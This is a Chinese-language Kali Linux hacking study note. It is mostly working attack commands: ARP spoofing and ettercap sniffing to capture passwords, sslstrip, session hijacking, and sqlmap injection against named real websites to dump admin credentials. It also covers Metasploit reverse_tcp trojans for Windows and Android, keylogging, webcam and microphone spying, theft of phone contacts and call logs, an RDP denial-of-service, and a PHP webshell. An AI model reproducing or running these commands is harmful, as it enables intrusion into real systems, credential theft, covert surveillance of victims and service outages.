kali實戰筆記 17:55 2016/7/19 by: _Silvers
kali系統安裝后的配置及美化
安裝vmwareTools
tar zxvf VMwareTools-sfsfsfasfasfsaf #解壓安裝包
cd 到解壓后的安裝目錄
./ 綠色的可執行文件 #進行安裝
# 等待安裝結束,期間根據提示進行y/n確定
reboot # 重啟kali
kali系統更新及替換國內軟件源
leafpad /etc/apt/sources.list
注釋掉官方的更新源
復制國內的更新源 #可百度國內更新源地址(新手推薦阿里雲的源)
更新系統
apt-get update #更新系統
apt-get dist-upgrade #安裝更新
kali的美化
apt-get install kde-full #kde桌面的安裝
端口掃描
nmap -sS 目標ip
Arp 內網斷網
Arpspoof -i 網卡 -t 目標ip 網關
獲取網卡/網關
ifconfig
獲取內網ip
fping -asg 192.168.1.0/24
Arp 欺騙
echo 寫命令,是不會有回顯的
ehco 1 >proc/sys/net/ipv4/ip_forward
# 進行IP流量轉發
目標 --》 我的網卡 --》網關
driftnet --> 獲取本機網卡的圖片
driftnet -i eth0 獲取本機網卡的圖片
ifconfig #查看網絡信息
iwconfig #查看網卡信息
kali中查找程序或命令
ex:sqlmap
find / -name sqlmap
find / -name ettercap
桌面美化工具 雨滴.exe (window)
==============================================================================
HTTP 帳號密碼獲取
Arpspoof --> 欺騙
Ettercap --> 欺騙 DNS欺騙 流量 嗅探
實戰前的信息采集:
目標機器: 目標ip,網關
攻擊機器: kali ip
arpspoof -i eth0 -t 目標ip 網關
開啟ip轉發
echo 1 >/proc/sys/net/ipv4/ip_forward
cat 查看內容
cat /proc/sys/net/ipv4/ip_forward
啟動ettercap進行流量嗅探
ettercap -Tq -i eth0
-Tq --> -T: 啟動文本模式,q:安靜模式;
-i --> i: 網關;
url解碼:www.convertstring.com
HTTPS 賬戶密碼獲取
進入kali文本模式
在進入輸入用戶名界面按ctrl+alt+F1
開啟SSH鏈接服務
一、配置SSH參數
修改sshd_config文件,命令為:
vi /etc/ssh/sshd_config
將#PasswordAuthentication no的注釋去掉,並且將NO修改為YES //kali中默認是yes
將PermitRootLogin without-password修改為
PermitRootLogin yes
Kali 2.0使用SSH進行遠程登錄
然后,保存,退出vim。
二、啟動SSH服務
命令為:
/etc/init.d/ssh start
或者
service ssh start
查看SSH服務狀態是否正常運行,命令為:
/etc/init.d/ssh status
或者
service ssh status
/etc/init.d/ssh start
==========================
vim /etc/ettercap/etter.conf
修改iptables規則
去掉注釋符號
保存推出
sslstrip --》 可以把HTTPS還原為http
arpspoof -i eth0 -t 目標ip 網關
開啟ip轉發
echo 1 >/proc/sys/net/ipv4/ip_forward
ettercap -Tq -i eth0
sslstrip -a -f -k
缺點:容易出現證書錯誤!
==============================
會話劫持
需要的工具
Arpspoof ==> Arp欺騙
Wireshark ==> 抓包
ferret ==> 重新生成抓包后的文件
hamster ==> 重放流量
#trip1:基於arp欺騙
arpspoof
arpspoof -i eth0 -t 目標ip 網關
echo 1 >/proc/sys/net/ipv4/ip_forward
start Wireshark #開始抓包
ferret -r cockie.pcap #生成hamster.txt
#trip2:基於ferret
ferret -1 eth0
hamster
#trip3:基於CookieCadger.jar一鍵劫持
install CookieCadger
選擇網卡
動態截取流量
======================================================
SqlMap
asp 網站,大多用的Access 文件 數據庫 MSSQL數據庫
數據庫
表
字段(列)
sqlmap -u http://www.baidu.com
-u 檢測是否存在注入
成功,返回數據庫信息
sqlmap -u www.baidu.com --tables
暴力猜解所有表名(有點慢)
sqlmap -u http://www.baidu.com --columns -T "user"
--columns 猜列名 根據user
sqlmap -u "http://www.baidu.com" --dump -C "username,password" -T "user"
--dump 下載數據 -C "username,password"列名
php 網站, 大多用Mysql
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --is-dba
back-end DBMS:MySQL >= 5.0.0
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dbs
列出所有數據庫
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --current-db
查找自己的數據庫
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"
猜解(查詢)所有表名 根據 ggec
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --columns -T "ggec_admin" -D "ggec"
查詢 所有的列
sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --dump -C "username,password" -T "ggec_admin" -D "ggec"
查詢列的字段
www.cmd5.com md5在線加解密站點
====================================
sqlmap cookie注入
sqlmap -u "http://www.wisefund.com.cn/about.asp" --cookie "id=56" --level 2
--cookie "" 這里寫id的參數,如果是cookie注入,就要把等級提升為level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --tables --cookie "id=56" --level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --columns -T "user" --cookie "id=56" --level 2
sqlmap -u "http://www.wisefund.com.cn/about.asp" --dump -C "username,password" -T "user" --cookie "id=56" --level 2
===========================================================================================================================
Metasploit 基礎
Exploit 模塊 -- 》 漏洞利用
Payloads -- 》 shellCode
use exploit/windows/smb/ms08_067_netapi
選擇漏洞利用模塊
show options
查看要填入的參數
set RHOST 192.168.1,100
set PAYLOAD window/meterpreter/reverse_tcp
RHOST --> 目標IP
LHOST --> 本機IP
exploit --》 執行操作
實施攻擊成功則反饋
msfconsole 從終端啟動metasploit
background
sessions -i number
木馬 :控制端 服務端
控制遠程 木馬程序
a.根據自己的IP生成一個馬
我的IP 192.168.1.103 55555
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=55555
X> test.exe
這么下來,就會生成一個test.exe的木馬程序
b. use exploit/multi/handler
使用handler這個模塊
set PAYLOAD windows/meterpreter/reverse_tcp
使用這個shellcode
LHOST = 192.168.1.103
LRORT = 55555
這里填寫 生成木馬的IP和端口
c. 先執行msf,再執行馬
木馬的使用
注入進程:木馬隨時有可能被結束掉的
ps: 得到我們要注入的PID進程
2036 2004 explorer.exe 桌面進程
migrate 2036 #注入進程
遠程桌面的開啟:
Run vnc 開啟遠程桌面
文件管理功能
Downlaod 下載文件
Edit 編輯文件
Cat 查看文件
mkdir 創建文件
Mv 移動文件
Rm 刪除文件
Upload 上傳文件
Rmdir 刪除文件夾
查看PHP文件: cat hack.php
下載文件: download hack.php
刪除文件: rm hack.php
上傳文件: upload hack.php
網絡及系統操作
Arp 查看ARP緩沖表
Ifconfig 查看IP地址網卡
Getproxy 獲取代理
Netstat 查看端口鏈接
kill 殺死進程
ps 查看進程
reboot 重啟機器
reg 修改注冊表
shell 獲取shell
shutdown 關機
sysinfo 獲取電腦信息
用戶操作和其他功能講解
enumdesktops 窗體
keyscan_dump 鍵盤記錄 -- 下載
keyscan_start 鍵盤記錄 -- 開始
keyscan_stop 鍵盤記錄 -- 停止
Uict1 獲取鍵盤鼠標控
uictl disable keyboard/mouse 禁用鍵盤/鼠標
uictl enable keyboard/mouse 啟用鍵盤/鼠標制權
record_mic 音頻錄制
record_mic -d 10 后台錄音10秒
webcam_chat 查看攝像頭接口
webcam_list 查看攝像頭列表
webcam_stream 攝像頭視頻獲取
GetSystem 獲取高權限
Hashdump 下載hash
=========================================================
Metasploit Androd實戰筆記
Msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.103 LPROT=55555
R > test.apk
Search 搜索 jpg,png,bmp
Download 下載 jpg,png,bmp
webcam_snap 手機截屏
webcam_stream -i [1:2?] 手機攝像頭監控
check_root 檢測Root
dump_calllog 下載電話記錄
dump_contacts 下載信息記錄
Geolocate 定位
==================================================
Metasploit服務器藍屏攻擊
DDos
服務器開啟 3389
確定目標: 192.168.1.103
MS12 020
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
服務器遠程桌面的一個可用模塊
auxiliary/scanner/rdp/ms12_020_check
掃描主機是否存在漏洞
RHOST R開頭,遠程主機
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
目的:比DDos來的更直接一些
Metasploit生成webshell
a.在msf中生成一個PHP腳本
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.101 R > web.php
生成一個PHP腳本
cat 查看文件內容